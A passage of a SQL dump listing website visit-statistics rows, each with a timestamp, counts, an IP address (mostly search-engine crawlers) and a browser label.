2,0,0,'66.249.64.56','chrome'),(532257,1597558675,2,2,0,0,'66.249.64.58','chrome'),(532258,1597558688,2,2,0,0,'66.249.64.60','chrome'),(532259,1597558908,8,8,0,0,'109.108.71.11','other'),(532260,1597558954,2,2,0,0,'66.249.70.80','chrome'),(532261,1597559662,1,1,0,0,'66.249.64.56','chrome'),(532262,1597559808,1,1,0,0,'66.249.70.76','chrome'),(532263,1597559943,8,8,0,0,'109.108.71.11','other'),(532264,1597560043,1,1,0,0,'182.22.27.22','other'),(532265,1597560122,1,1,0,0,'66.249.70.78','chrome'),(532266,1597560969,1,1,0,0,'66.249.64.60','chrome'),(532267,1597561011,8,8,0,0,'109.108.71.11','other'),(532268,1597561119,1,1,0,0,'17.58.99.84','other'),(532269,1597561288,3,3,0,0,'66.249.70.78','chrome'),(532270,1597561563,1,1,0,0,'66.249.70.76','chrome'),(532271,1597562072,8,8,0,0,'109.108.71.11','other'),(532272,1597562306,1,0,1,0,'66.249.70.80',''),(532273,1597562399,2,2,0,0,'66.249.70.80','chrome'),(532274,1597562691,3,3,0,0,'66.249.70.78','chrome'),(532275,1597562732,1,1,0,0,'178.154.200.28','other'),(532276,1597562775,1,1,0,0,'66.249.70.76','chrome'),(532277,1597563117,8,8,0,0,'109.108.71.11','other'),(532278,1597563377,1,1,0,0,'66.249.64.56','chrome'),(532279,1597564180,8,8,0,0,'109.108.71.11','other'),(532280,1597564237,3,3,0,0,'66.249.70.78','chrome'),(532281,1597564537,1,0,1,0,'66.249.64.56',''),(532282,1597564574,1,1,0,0,'66.249.64.56','chrome'),(532283,1597564762,3,3,0,0,'66.249.70.76','chrome'),(532284,1597565266,8,8,0,0,'109.108.71.11','other'),(532285,1597565531,7,7,0,0,'82.165.119.24','other'),(532286,1597566226,2,2,0,0,'66.249.70.76','chrome'),(532287,1597566349,8,8,0,0,'109.108.71.11','other'),(532288,1597566879,1,1,0,0,'5.255.253.151','other'),(532289,1597566996,1,1,0,0,'17.58.99.7','other'),(532290,1597567205,1,1,0,0,'5.255.253.183','other'),(532291,1597567221,1,1,0,0,'66.249.70.76','chrome'),(532292,1597567244,1,1,0,0,'66.249.70.78','chrome'),(532293,1597567288,3,3,0,0,'66.249.70.80','chrome'),(532294,1597567455,8,8,0,0,'109.108.71.11','other'),(532295,1597567704,1,1,0,0,'66.249.64.60','chrome'),(532296,1597568151,1,1,0,0,'66.249.64.56','chrome'),(532297,1597568359,4,4,0,0,'66.249.70.78','chrome'),(532298,1597568516,8,8,0,0,'109.108.71.11','other'),(532299,1597568523,1,1,0,0,'66.249.70.76','chrome'),(532300,1597569035,1,1,0,0,'66.249.64.60','chrome'),(532301,1597569091,1,1,0,0,'8.29.198.25','other'),(532302,1597569569,8,8,0,0,'109.108.71.11','other'),(532303,1597569589,1,0,1,0,'66.249.70.80',''),(532304,1597569819,1,1,0,0,'66.249.70.80','chrome'),(532305,1597570031,2,2,0,0,'66.249.70.76','chrome'),(532306,1597570230,2,2,0,0,'66.249.70.78','chrome'),(532307,1597570648,8,8,0,0,'109.108.71.11','other'),(532308,1597570730,1,1,0,0,'66.249.70.80','chrome'),(532309,1597571204,1,1,0,0,'178.154.200.48','other'),(532310,1597571217,1,1,0,0,'66.249.70.78','chrome'),(532311,1597571733,8,8,0,0,'109.108.71.11','other'),(532312,1597571885,1,1,0,0,'66.249.64.60','chrome'),(532313,1597572650,1,1,0,0,'66.249.70.78','chrome'),(532314,1597572787,2,2,0,0,'66.249.70.80','chrome'),(532315,1597572821,8,8,0,0,'109.108.71.11','other'),(532316,1597573519,1,1,0,0,'17.58.99.7','other'),(532317,1597573799,2,2,0,0,'66.249.70.76','chrome'),(532318,1597573884,1,1,0,0,'178.154.200.28','other'),(532319,1597573947,8,8,0,0,'109.108.71.11','other'),(532320,1597574089,1,1,0,0,'13.53.68.100','other'),(532321,1597574548,1,1,0,0,'66.249.70.78','chrome'),(532322,1597574584,1,1,0,0,'66.249.64.60','chrome'),(532323,1597574607,1,1,0,0,'66.249.64.56','chrome'),(532324,1597575039,8,8,0,0,'109.108.71.11','other'),(532325,1597575416,1,1,0,0,'109.74.154.72','chrome'),(532326,1597575920,2,2,0,0,'66.249.70.80','chrome'),(532327,1597576004,2,2,0,0,'66.249.64.58','chrome'),(532328,1597576008,3,3,0,0,'66.249.64.56','chrome'),(532329,1597576134,8,8,0,0,'109.108.71.11','other'),(532330,1597576172,2,2,0,0,'66.249.70.78','chrome'),(532331,1597576176,5,5,0,0,'66.249.70.76','chrome'),(532332,1597576600,1,1,0,0,'5.255.253.105','other'),(532333,1597577176,1,1,0,0,'66.249.70.78','chrome'),(532334,1597577229,8,8,0,0,'109.108.71.11','other'),(532335,1597577606,5,5,0,0,'66.249.64.56','chrome'),(532336,1597578014,1,1,0,0,'5.255.253.126','other'),(532337,1597578177,3,3,0,0,'66.249.70.78','chrome'),(532338,1597578269,2,2,0,0,'66.249.70.76','chrome'),(532339,1597578347,8,8,0,0,'109.108.71.11','other'),(532340,1597578778,1,1,0,0,'66.249.64.60','chrome'),(532341,1597579097,1,1,0,0,'3.123.43.119','other'),(532342,1597579499,8,8,0,0,'109.108.71.11','other'),(532343,1597579927,1,1,0,0,'8.29.198.26','other'),(532344,1597580185,5,5,0,0,'66.249.70.76','chrome'),(532345,1597580521,1,1,0,0,'66.249.70.80','chrome'),(532346,1597580599,8,8,0,0,'109.108.71.11','other'),(532347,1597581719,8,8,0,0,'109.108.71.11','other'),(532348,1597582834,1,1,0,0,'5.45.207.174','other'),(532349,1597582835,1,1,0,0,'178.154.200.28','other'),(532350,1597582884,1,1,0,0,'66.249.64.58','chrome'),(532351,1597582901,8,8,0,0,'109.108.71.11','other'),(532352,1597583645,1,1,0,0,'66.249.64.60','chrome'),(532353,1597584044,8,8,0,0,'109.108.71.11','other'),(532354,1597584769,1,1,0,0,'66.249.64.58','chrome'),(532355,1597585169,8,8,0,0,'109.108.71.11','other'),(532356,1597585180,1,1,0,0,'66.249.70.78','chrome'),(532357,1597585804,1,1,0,0,'66.249.70.76','chrome'),(532358,1597586263,8,8,0,0,'109.108.71.11','other'),(532359,1597586711,1,1,0,0,'66.249.70.78','chrome'),(532360,1597587374,8,8,0,0,'109.108.71.11','other'),(532361,1597588487,8,8,0,0,'109.108.71.11','other'),(532362,1597588552,1,1,0,0,'66.249.70.78','chrome'),(532363,1597589544,1,1,0,0,'66.249.70.78','chrome'),(532364,1597589590,8,8,0,0,'109.108.71.11','other'),(532365,1597589866,1,1,0,0,'31.13.127.13','other'),(532366,1597590714,8,8,0,0,'109.108.71.11','other'),(532367,1597590761,1,1,0,0,'8.29.198.26','other'),(532368,1597591805,1,1,0,0,'178.154.200.105','other'),(532369,1597591821,8,8,0,0,'109.108.71.11','other'),(532370,1597592050,1,1,0,0,'157.55.39.78','other'),(532371,1597592252,1,1,0,0,'46.211.81.136','chrome'),(532372,1597592919,8,8,0,0,'109.108.71.11','other'),(532373,1597593590,1,1,0,0,'84.17.56.152','other'),(532374,1597594032,8,8,0,0,'109.108.71.11','other'),(532375,1597594730,1,1,0,0,'66.249.70.78','chrome'),(532376,1597594734,3,2,1,0,'66.249.70.76',''),(532377,1597595148,8,8,0,0,'109.108.71.11','other'),(532378,1597595243,1,1,0,0,'31.13.127.11','other'),(532379,1597595495,1,1,0,0,'66.249.70.80','chrome'),(532380,1597596274,8,8,0,0,'109.108.71.11','other'),(532381,1597596672,1,1,0,0,'66.249.64.56','chrome'),(532382,1597596676,3,2,1,0,'66.249.70.76',''),(532383,1597597187,1,1,0,0,'17.58.99.7','other'),(532384,1597597399,8,8,0,0,'109.108.71.11','other'),(532385,1597597929,1,1,0,0,'66.249.70.80','chrome'),(532386,1597597937,2,2,0,0,'66.249.70.76','chrome'),(532387,1597598552,8,8,0,0,'109.108.71.11','other'),(532388,1597598836,1,1,0,0,'207.46.13.52','other'),(532389,1597598849,1,1,0,0,'157.55.39.83','other'),(532390,1597598902,1,1,0,0,'66.249.70.80','chrome'),(532391,1597599019,1,1,0,0,'46.147.64.93','chrome'),(532392,1597599117,1,1,0,0,'31.170.129.50','chrome'),(532393,1597599687,8,8,0,0,'109.108.71.11','other'),(532394,1597600812,8,8,0,0,'109.108.71.11','other'),(532395,1597600821,1,1,0,0,'207.46.13.187','other'),(532396,1597601195,1,1,0,0,'91.196.178.1','chrome'),(532397,1597601587,1,1,0,0,'8.29.198.26','other'),(532398,1597601605,2,1,1,0,'66.249.70.78',''),(532399,1597601967,2,2,0,0,'66.249.70.76','chrome'),(532400,1597601968,2,2,0,0,'66.249.70.78','chrome'),(532401,1597602008,8,8,0,0,'109.108.71.11','other'),(532402,1597603030,1,0,1,0,'66.249.70.80',''),(532403,1597603179,8,8,0,0,'109.108.71.11','other'),(532404,1597603199,1,1,0,0,'88.155.69.104','chrome'),(532405,1597603235,2,1,1,0,'66.249.70.80',''),(532406,1597603545,1,1,0,0,'66.249.70.80','chrome'),(532407,1597603554,1,0,1,0,'66.249.70.78',''),(532408,1597604332,8,8,0,0,'109.108.71.11','other'),(532409,1597604827,1,1,0,0,'178.154.200.120','other'),(532410,1597604831,1,1,0,0,'178.154.200.142','other'),(532411,1597604861,2,2,0,0,'66.249.70.76','chrome'),(532412,1597605498,8,8,0,0,'109.108.71.11','other'),(532413,1597606696,8,8,0,0,'109.108.71.11','other'),(532414,1597606821,1,0,1,0,'66.249.64.60',''),(532415,1597606840,1,1,0,0,'51.83.216.203','firefox'),(532416,1597606843,1,1,0,0,'66.249.64.58','chrome'),(532417,1597606915,1,1,0,0,'66.249.70.76','chrome'),(532418,1597607262,1,1,0,0,'91.196.178.1','chrome'),(532419,1597607890,8,8,0,0,'109.108.71.11','other'),(532420,1597607923,2,2,0,0,'66.249.70.76','chrome'),(532421,1597608206,1,1,0,0,'66.249.70.80','chrome'),(532422,1597609042,8,8,0,0,'109.108.71.11','other'),(532423,1597609728,2,2,0,0,'66.249.70.78','chrome'),(532424,1597610084,1,1,0,0,'66.249.70.80','chrome'),(532425,1597610173,8,8,0,0,'109.108.71.11','other'),(532426,1597610215,1,1,0,0,'66.249.64.56','chrome'),(532427,1597611296,8,8,0,0,'109.108.71.11','other'),(532428,1597611724,1,1,0,0,'66.249.70.76','chrome'),(532429,1597611815,2,2,0,0,'207.46.13.19','other'),(532430,1597612415,1,1,0,0,'8.29.198.27','other'),(532431,1597612435,8,8,0,0,'109.108.71.11','other'),(532432,1597613567,8,8,0,0,'109.108.71.11','other'),(532433,1597613648,1,1,0,0,'66.249.64.60','chrome'),(532434,1597614005,1,1,0,0,'5.45.207.92','other'),(532435,1597614330,1,1,0,0,'66.249.70.76','chrome'),(532436,1597614757,8,8,0,0,'109.108.71.11','other'),(532437,1597615675,1,1,0,0,'157.55.39.240','other'),(532438,1597615898,8,8,0,0,'109.108.71.11','other'),(532439,1597616736,1,1,0,0,'66.249.70.76','chrome'),(532440,1597616790,1,1,0,0,'66.249.70.78','chrome'),(532441,1597616909,2,2,0,0,'66.249.70.80','chrome'),(532442,1597616989,1,1,0,0,'66.249.64.56','chrome'),(532443,1597617027,8,8,0,0,'109.108.71.11','other'),(532444,1597617600,1,1,0,0,'66.249.64.58','chrome'),(532445,1597617681,1,1,0,0,'207.46.13.19','other'),(532446,1597617940,1,1,0,0,'66.249.70.80','chrome'),(532447,1597618112,8,8,0,0,'109.108.71.11','other'),(532448,1597618281,4,4,0,0,'66.249.70.78','chrome'),(532449,1597618494,2,2,0,0,'66.249.70.76','chrome'),(532450,1597618944,2,2,0,0,'66.249.70.80','chrome'),(532451,1597619117,1,1,0,0,'66.249.64.60','chrome'),(532452,1597619209,8,8,0,0,'109.108.71.11','other'),(532453,1597619320,1,1,0,0,'66.249.64.56','chrome'),(532454,1597620139,47,47,0,0,'173.231.59.209','other'),(532455,1597620172,3,3,0,0,'35.202.213.105','chrome'),(532456,1597620177,1,1,0,0,'35.202.213.105','other'),(532457,1597620285,1,1,0,0,'82.165.253.73','other'),(532458,1597620311,8,8,0,0,'109.108.71.11','other'),(532459,1597620475,2,2,0,0,'66.249.70.78','chrome'),(532460,1597620557,3,3,0,0,'34.70.223.99','chrome'),(532461,1597620559,1,1,0,0,'34.70.223.99','other'),(532462,1597620711,3,3,0,0,'35.188.97.82','chrome'),(532463,1597620713,1,1,0,0,'35.188.97.82','other'),(532464,1597620760,3,3,0,0,'35.224.255.68','chrome'),(532465,1597620761,1,1,0,0,'35.224.255.68','other'),(532466,1597620822,3,3,0,0,'34.67.61.213','chrome'),(532467,1597620823,1,1,0,0,'34.67.61.213','other'),(532468,1597620882,2,2,0,0,'66.249.64.60','chrome'),(532469,1597620892,3,3,0,0,'35.225.178.144','chrome'),(532470,1597620893,1,1,0,0,'35.225.178.144','other'),(532471,1597621051,34,34,0,0,'173.231.59.209','other'),(532472,1597621364,1,1,0,0,'66.249.70.76','chrome'),(532473,1597621439,8,8,0,0,'109.108.71.11','other'),(532474,1597621828,5,5,0,0,'66.249.70.78','chrome'),(532475,1597621913,1,1,0,0,'66.249.70.80','chrome'),(532476,1597621968,3,3,0,0,'173.231.59.209','other'),(532477,1597622107,1,1,0,0,'62.205.134.182','other'),(532478,1597622549,1,1,0,0,'109.108.71.11','other'),(532479,1597622550,1,1,0,0,'66.249.70.76','chrome'),(532480,1597622723,1,1,0,0,'66.249.64.58','chrome'),(532481,1597622758,1,1,0,0,'66.249.70.78','chrome'),(532482,1597622816,2,2,0,0,'66.249.70.80','chrome'),(532483,1597623244,1,1,0,0,'8.29.198.25','other'),(532484,1597623658,8,8,0,0,'109.108.71.11','other'),(532485,1597623798,1,1,0,0,'66.249.70.80','chrome'),(532486,1597624090,1,1,0,0,'5.45.207.75','other'),(532487,1597624093,1,1,0,0,'5.157.37.244','opera'),(532488,1597624603,3,3,0,0,'66.249.70.76','chrome'),(532489,1597624616,2,2,0,0,'66.249.70.78','chrome'),(532490,1597624759,8,8,0,0,'109.108.71.11','other'),(532491,1597625639,1,1,0,0,'66.249.64.58','chrome'),(532492,1597625687,1,1,0,0,'66.249.70.80','chrome'),(532493,1597625745,2,2,0,0,'66.249.70.78','chrome'),(532494,1597625795,1,1,0,0,'157.55.39.188','other'),(532495,1597625796,8,8,0,0,'109.108.71.11','other'),(532496,1597626322,1,1,0,0,'17.58.99.84','other'),(532497,1597626846,8,8,0,0,'109.108.71.11','other'),(532498,1597626856,2,2,0,0,'66.249.70.76','chrome'),(532499,1597627275,4,4,0,0,'66.249.70.78','chrome'),(532500,1597627922,8,8,0,0,'109.108.71.11','other'),(532501,1597628320,1,1,0,0,'66.249.70.80','chrome'),(532502,1597628357,1,1,0,0,'207.46.13.184','other'),(532503,1597628674,4,4,0,0,'66.249.70.76','chrome'),(532504,1597628973,8,8,0,0,'109.108.71.11','other'),(532505,1597629426,1,1,0,0,'66.249.64.56','chrome'),(532506,1597629527,1,1,0,0,'66.249.64.60','chrome'),(532507,1597629583,1,1,0,0,'51.77.52.160','chrome'),(532508,1597629750,1,1,0,0,'66.249.70.78','chrome'),(532509,1597630032,8,8,0,0,'109.108.71.11','other'),(532510,1597630306,1,1,0,0,'66.249.70.76','chrome'),(532511,1597630691,1,1,0,0,'66.249.64.60','chrome'),(532512,1597631102,8,8,0,0,'109.108.71.11','other'),(532513,1597631943,2,2,0,0,'66.249.64.60','chrome'),(532514,1597632156,8,8,0,0,'109.108.71.11','other'),(532515,1597633032,1,1,0,0,'66.249.64.60','chrome'),(532516,1597633080,2,2,0,0,'5.45.207.174','other'),(532517,1597633246,8,8,0,0,'109.108.71.11','other'),(532518,1597633523,2,2,0,0,'66.249.70.78','chrome'),(532519,1597633762,2,2,0,0,'66.249.70.80','chrome'),(532520,1597633770,1,1,0,0,'13.49.49.219','other'),(532521,1597633797,2,2,0,0,'66.249.70.76','chrome'),(532522,1597634070,1,1,0,0,'8.29.198.25','other'),(532523,1597634310,8,8,0,0,'109.108.71.11','other'),(532524,1597634508,2,2,0,0,'66.249.70.78','chrome'),(532525,1597634943,1,1,0,0,'157.55.39.53','other'),(532526,1597635410,8,8,0,0,'109.108.71.11','other'),(532527,1597635469,2,2,0,0,'66.249.70.78','chrome'),(532528,1597635646,1,1,0,0,'66.249.70.80','chrome'),(532529,1597635704,1,1,0,0,'66.249.64.60','chrome'),(532530,1597636284,1,0,1,0,'66.249.70.76',''),(532531,1597636488,8,8,0,0,'109.108.71.11','other'),(532532,1597636717,2,2,0,0,'66.249.70.80','chrome'),(532533,1597637244,2,2,0,0,'66.249.70.76','chrome'),(532534,1597637558,8,8,0,0,'109.108.71.11','other'),(532535,1597637921,1,1,0,0,'157.55.39.119','other'),(532536,1597637960,2,2,0,0,'66.249.70.80','chrome'),(532537,1597638394,1,1,0,0,'66.249.64.58','chrome'),(532538,1597638438,3,3,0,0,'66.249.70.76','chrome'),(532539,1597639072,1,1,0,0,'5.45.207.174','other'),(532540,1597639516,2,2,0,0,'66.249.70.78','chrome'),(532541,1597639663,1,1,0,0,'136.27.62.24','firefox'),(532542,1597639726,1,1,0,0,'131.220.6.152','chrome'),(532543,1597640321,1,1,0,0,'5.45.207.92','other'),(532544,1597640410,1,1,0,0,'157.55.39.119','other'),(532545,1597640438,2,2,0,0,'66.249.64.58','chrome'),(532546,1597640447,1,1,0,0,'66.249.70.76','chrome'),(532547,1597640512,1,1,0,0,'62.205.134.182','other'),(532548,1597640803,1,1,0,0,'5.45.207.170','other'),(532549,1597642011,1,1,0,0,'66.249.70.76','chrome'),(532550,1597642053,3,3,0,0,'66.249.70.80','chrome'),(532551,1597642106,2,2,0,0,'66.249.70.78','chrome'),(532552,1597642717,1,1,0,0,'91.196.178.72','chrome'),(532553,1597642958,1,1,0,0,'207.46.13.8','other'),(532554,1597643315,1,1,0,0,'66.249.64.56','chrome'),(532555,1597643528,1,0,1,0,'66.249.70.80',''),(532556,1597643751,1,1,0,0,'157.55.39.115','other'),(532557,1597644040,1,1,0,0,'66.249.70.76','chrome'),(532558,1597644048,1,1,0,0,'157.55.39.240','other'),(532559,1597644089,1,1,0,0,'66.249.64.58','chrome'),(532560,1597644459,1,1,0,0,'207.46.13.129','other'),(532561,1597644566,3,3,0,0,'66.249.70.78','chrome'),(532562,1597644894,1,1,0,0,'8.29.198.26','other'),(532563,1597644916,1,1,0,0,'17.58.99.7','other'),(532564,1597645276,1,1,0,0,'157.55.39.242','other'),(532565,1597645429,1,1,0,0,'66.249.70.76','chrome'),(532566,1597645513,1,1,0,0,'66.249.64.58','chrome'),(532567,1597645517,1,1,0,0,'91.196.178.79','chrome'),(532568,1597645765,1,1,0,0,'66.249.70.80','chrome'),(532569,1597646076,1,1,0,0,'157.55.39.53','other'),(532570,1597646248,3,3,0,0,'66.249.70.78','chrome'),(532571,1597646296,1,1,0,0,'66.249.64.60','chrome'),(532572,1597646365,1,1,0,0,'178.154.200.32','other'),(532573,1597646955,1,1,0,0,'66.249.64.56','chrome'),(532574,1597647119,1,1,0,0,'207.46.13.106','other'),(532575,1597647207,1,1,0,0,'157.55.39.119','other'),(532576,1597647363,1,1,0,0,'66.249.70.78','chrome'),(532577,1597647412,1,1,0,0,'5.255.253.69','other'),(532578,1597648839,1,1,0,0,'207.46.13.92','other'),(532579,1597649004,2,2,0,0,'66.249.70.76','chrome'),(532580,1597649420,1,1,0,0,'66.249.64.56','chrome'),(532581,1597649641,1,1,0,0,'66.249.70.80','chrome'),(532582,1597649682,2,2,0,0,'212.90.62.137','chrome'),(532583,1597649714,2,2,0,0,'91.196.178.79','chrome'),(532584,1597649964,2,2,0,0,'66.249.70.76','chrome'),(532585,1597650111,1,1,0,0,'91.196.177.46','chrome'),(532586,1597650115,1,1,0,0,'157.55.39.183','other'),(532587,1597650493,1,1,0,0,'66.249.70.78','chrome'),(532588,1597650618,1,1,0,0,'66.249.64.60','chrome'),(532589,1597650792,1,1,0,0,'5.255.253.136','other'),(532590,1597650810,1,1,0,0,'207.46.13.20','other'),(532591,1597650878,1,1,0,0,'91.196.178.76','chrome'),(532592,1597651057,2,2,0,0,'66.249.70.76','chrome'),(532593,1597651120,3,3,0,0,'66.249.70.80','chrome'),(532594,1597651150,1,1,0,0,'157.55.39.183','other'),(532595,1597651323,1,1,0,0,'216.74.106.95','chrome'),(532596,1597651495,2,2,0,0,'88.155.182.197','chrome'),(532597,1597651521,1,1,0,0,'66.249.70.78','chrome'),(532598,1597651788,1,1,0,0,'157.55.39.53','other'),(532599,1597652055,1,1,0,0,'213.108.45.138','firefox'),(532600,1597652339,4,4,0,0,'66.249.70.80','chrome'),(532601,1597652365,1,1,0,0,'66.249.70.76','chrome'),(532602,1597652504,1,1,0,0,'207.46.13.106','other'),(532603,1597652759,1,1,0,0,'66.249.70.78','chrome'),(532604,1597652858,1,1,0,0,'91.196.178.79','chrome'),(532605,1597653413,1,1,0,0,'5.255.253.88','other'),(532606,1597653514,2,2,0,0,'66.249.64.58','chrome'),(532607,1597653577,2,2,0,0,'66.249.70.80','chrome'),(532608,1597653917,3,3,0,0,'66.249.70.76','chrome'),(532609,1597654119,1,1,0,0,'66.249.70.78','chrome'),(532610,1597654535,1,1,0,0,'91.196.178.72','chrome'),(532611,1597654717,1,1,0,0,'5.45.207.174','other'),(532612,1597655037,2,2,0,0,'66.249.70.78','chrome'),(532613,1597655146,1,1,0,0,'178.154.200.32','other'),(532614,1597655599,2,2,0,0,'66.249.70.76','chrome'),(532615,1597655678,1,1,0,0,'157.55.39.183','other'),(532616,1597655717,1,1,0,0,'8.29.198.27','other'),(532617,1597655975,1,1,0,0,'207.46.13.50','other'),(532618,1597655989,1,1,0,0,'207.46.13.46','other'),(532619,1597656010,1,1,0,0,'207.46.13.171','other'),(532620,1597656034,1,1,0,0,'5.45.207.174','other'),(532621,1597656223,2,2,0,0,'66.249.70.80','chrome'),(532622,1597656250,2,2,0,0,'66.249.70.78','chrome'),(532623,1597656480,1,1,0,0,'66.249.64.56','chrome'),(532624,1597656745,3,3,0,0,'66.249.70.76','chrome'),(532625,1597656755,1,1,0,0,'207.46.13.129','other'),(532626,1597657651,2,2,0,0,'66.249.70.78','chrome'),(532627,1597657789,1,1,0,0,'66.249.64.60','chrome'),(532628,1597657794,1,1,0,0,'18.219.51.122','chrome'),(532629,1597657837,1,1,0,0,'66.249.70.80','chrome'),(532630,1597657940,1,1,0,0,'91.196.178.79','chrome'),(532631,1597658964,1,1,0,0,'17.58.99.84','other'),(532632,1597659152,1,1,0,0,'66.249.70.78','chrome'),(532633,1597659650,1,1,0,0,'66.249.64.56','chrome'),(532634,1597659766,1,1,0,0,'66.249.70.76','chrome'),(532635,1597659845,2,2,0,0,'66.249.70.80','chrome'),(532636,1597660141,1,1,0,0,'17.58.99.84','other'),(532637,1597660286,1,1,0,0,'157.55.39.119','other'),(532638,1597660974,1,1,0,0,'91.196.178.179','chrome'),(532639,1597661053,2,2,0,0,'66.249.70.78','chrome'),(532640,1597661216,1,1,0,0,'93.124.44.164','chrome'),(532641,1597661367,1,1,0,0,'66.249.70.76','chrome'),(532642,1597661438,1,1,0,0,'95.24.132.90','chrome'),(532643,1597661969,2,2,0,0,'66.249.70.78','chrome'),(532644,1597662199,1,1,0,0,'207.46.13.129','other'),(532645,1597662660,51,51,0,0,'173.231.59.209','other'),(532646,1597662785,1,1,0,0,'109.74.154.72','chrome'),(532647,1597662884,4,4,0,0,'66.249.70.80','chrome'),(532648,1597662921,3,3,0,0,'66.249.70.76','chrome'),(532649,1597663258,1,1,0,0,'66.249.64.56','chrome'),(532650,1597663562,3,3,0,0,'66.249.70.78','chrome'),(532651,1597663571,32,32,0,0,'173.231.59.209','other'),(532652,1597663849,1,1,0,0,'66.249.70.76','chrome'),(532653,1597664366,1,1,0,0,'91.196.178.97','chrome'),(532654,1597664491,3,3,0,0,'94.45.128.92','chrome'),(532655,1597664528,1,1,0,0,'173.231.59.209','other'),(532656,1597664721,3,3,0,0,'66.249.70.80','chrome'),(532657,1597664889,2,2,0,0,'66.249.64.58','chrome'),(532658,1597665353,1,1,0,0,'5.255.253.183','other'),(532659,1597665473,2,2,0,0,'78.31.180.65','chrome'),(532660,1597665565,1,1,0,0,'178.154.200.112','other'),(532661,1597665642,3,3,0,0,'66.249.70.78','chrome'),(532662,1597665759,2,2,0,0,'66.249.70.80','chrome'),(532663,1597665792,1,1,0,0,'66.249.64.60','chrome'),(532664,1597665929,2,2,0,0,'66.249.70.76','chrome'),(532665,1597666544,1,1,0,0,'8.29.198.27','other'),(532666,1597667096,1,1,0,0,'5.45.207.153','other'),(532667,1597667098,1,1,0,0,'178.154.200.125','other'),(532668,1597667189,1,1,0,0,'91.196.178.79','chrome'),(532669,1597667455,1,1,0,0,'66.249.70.78','chrome'),(532670,1597667535,1,1,0,0,'66.249.64.56','chrome'),(532671,1597667658,1,1,0,0,'5.45.207.174','other'),(532672,1597667853,1,1,0,0,'66.249.70.80','chrome'),(532673,1597668092,3,3,0,0,'66.249.70.76','chrome'),(532674,1597668130,1,1,0,0,'207.46.13.106','other'),(532675,1597668312,1,1,0,0,'5.255.253.136','other'),(532676,1597668535,1,0,1,0,'66.249.70.78',''),(532677,1597668558,1,1,0,0,'91.124.239.68','chrome'),(532678,1597668595,1,1,0,0,'91.196.178.169','chrome'),(532679,1597669522,1,1,0,0,'178.154.200.112','other'),(532680,1597669542,1,1,0,0,'5.255.253.136','other'),(532681,1597669628,2,2,0,0,'66.249.70.76','chrome'),(532682,1597669632,2,2,0,0,'66.249.70.78','chrome'),(532683,1597669826,1,1,0,0,'17.58.99.84','other'),(532684,1597669982,1,1,0,0,'66.249.64.60','chrome'),(532685,1597670251,1,1,0,0,'91.196.177.46','chrome'),(532686,1597670370,1,1,0,0,'178.154.200.120','other'),(532687,1597670720,1,1,0,0,'66.249.70.80','chrome'),(532688,1597670822,2,2,0,0,'54.187.13.46','chrome'),(532689,1597671194,2,2,0,0,'66.249.70.78','chrome'),(532690,1597671246,1,1,0,0,'157.55.39.119','other'),(532691,1597671776,1,1,0,0,'91.196.178.79','chrome'),(532692,1597671986,1,1,0,0,'66.249.70.76','chrome'),(532693,1597672251,1,1,0,0,'188.122.82.146','chrome'),(532694,1597672564,8,8,0,0,'109.108.71.11','other'),(532695,1597672767,3,2,1,0,'66.249.70.78',''),(532696,1597672887,1,1,0,0,'88.155.115.181','chrome'),(532697,1597673136,1,1,0,0,'5.45.207.174','other'),(532698,1597673138,2,2,0,0,'157.55.39.115','other'),(532699,1597673211,2,2,0,0,'66.249.64.58','chrome'),(532700,1597673229,2,2,0,0,'66.249.70.78','chrome'),(532701,1597673455,1,1,0,0,'66.249.70.76','chrome'),(532702,1597673459,1,1,0,0,'66.249.64.56','chrome'),(532703,1597673657,1,1,0,0,'5.45.207.92','other'),(532704,1597673715,8,8,0,0,'109.108.71.11','other'),(532705,1597673737,2,2,0,0,'91.196.178.79','chrome'),(532706,1597674447,1,1,0,0,'66.249.70.80','chrome'),(532707,1597674882,8,8,0,0,'109.108.71.11','other'),(532708,1597675101,1,1,0,0,'207.46.13.171','other'),(532709,1597675149,1,1,0,0,'66.249.70.78','chrome'),(532710,1597675743,1,1,0,0,'66.249.70.80','chrome'),(532711,1597675744,1,1,0,0,'91.196.178.169','chrome'),(532712,1597676068,8,8,0,0,'109.108.71.11','other'),(532713,1597676220,1,0,1,0,'66.249.70.76',''),(532714,1597677162,2,2,0,0,'66.249.70.76','chrome'),(532715,1597677301,1,1,0,0,'5.45.207.92','other'),(532716,1597677324,8,8,0,0,'109.108.71.11','other'),(532717,1597677368,1,1,0,0,'8.29.198.25','other'),(532718,1597677700,1,1,0,0,'91.196.178.169','chrome'),(532719,1597678552,2,2,0,0,'66.249.70.76','chrome'),(532720,1597678790,1,1,0,0,'91.196.178.21','chrome'),(532721,1597678873,1,1,0,0,'134.19.179.235','chrome'),(532722,1597679344,2,2,0,0,'66.249.70.80','chrome'),(532723,1597679597,8,8,0,0,'109.108.71.11','other'),(532724,1597679759,1,1,0,0,'5.45.207.75','other'),(532725,1597680601,1,1,0,0,'91.196.178.1','chrome'),(532726,1597680762,1,1,0,0,'192.38.128.206','chrome'),(532727,1597680857,2,2,0,0,'66.249.70.80','chrome'),(532728,1597681065,2,2,0,0,'66.249.70.78','chrome'),(532729,1597681069,1,1,0,0,'66.249.64.60','chrome'),(532730,1597681290,1,1,0,0,'17.58.99.7','other'),(532731,1597681447,1,1,0,0,'207.46.13.106','other'),(532732,1597681631,1,1,0,0,'5.45.207.174','other'),(532733,1597681632,8,8,0,0,'109.108.71.11','other'),(532734,1597681861,49,49,0,0,'173.231.59.209','other'),(532735,1597681963,1,1,0,0,'66.249.70.80','chrome'),(532736,1597682330,1,1,0,0,'157.55.39.183','other'),(532737,1597682463,1,1,0,0,'66.249.70.78','chrome'),(532738,1597682530,1,1,0,0,'178.154.200.105','other'),(532739,1597682765,8,8,0,0,'109.108.71.11','other'),(532740,1597682766,11,11,0,0,'173.231.59.209','other'),(532741,1597683547,1,1,0,0,'213.180.203.22','other'),(532742,1597683667,53,53,0,0,'173.231.59.209','other'),(532743,1597683778,1,1,0,0,'66.249.70.78','chrome'),(532744,1597683885,1,1,0,0,'176.36.31.181','chrome'),(532745,1597683933,8,8,0,0,'109.108.71.11','other'),(532746,1597684126,1,1,0,0,'66.249.70.80','chrome'),(532747,1597684315,1,1,0,0,'157.55.39.119','other'),(532748,1597684571,29,29,0,0,'173.231.59.209','other'),(532749,1597684965,1,1,0,0,'176.36.31.181','chrome'),(532750,1597684973,1,1,0,0,'66.249.70.78','chrome'),(532751,1597685034,8,8,0,0,'109.108.71.11','other'),(532752,1597685135,1,1,0,0,'5.45.207.174','other'),(532753,1597685249,1,1,0,0,'207.46.13.92','other'),(532754,1597685268,1,1,0,0,'66.249.70.80','chrome'),(532755,1597685381,1,1,0